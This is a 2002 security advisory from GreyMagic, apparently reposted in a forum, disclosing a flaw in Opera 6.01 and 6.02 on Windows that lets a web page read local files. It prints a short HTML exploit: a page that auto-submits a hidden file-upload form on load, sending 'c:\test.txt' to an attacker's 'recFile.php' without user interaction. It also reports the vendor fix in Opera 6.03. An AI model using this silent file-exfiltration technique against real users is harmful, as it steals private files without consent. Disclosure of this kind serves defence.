GreyMagic Security Advisory GM#001-OP
By GreyMagic Software, Israel.
27 May 2002. Topic: Reading ANY local file in Opera.
Discovery date: 07 May 2002.
Affected applications:
Opera 6.01 on Windows platforms.
Opera 6.02 on Windows platforms.
Exploit:
This exploit will automatically transfer the file "c:/test.txt" to an attacking host, which can handle it using a server-side environment such as ASP, PHP or other solutions. It does not require any user interaction:
Code:
<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm">
<input type="file" name="expFile" value="c:\test.txt
" style="visibility:hidden">
</form>
</body>
Solution:
Opera was informed on 15 May 2002 and confirmed our findings. A day later, in the evening of 16 May 2002, Opera informed us that the vulnerability was fixed and committed to Opera's own version control system. On 27 May 2002, Opera released version 6.03, which addressed this issue. Opera has been extremely responsive and quick to understand and patch this vulnerability. They have shown that they truly do take security seriously.
The rest of the article can be found
here.
Reply With Quote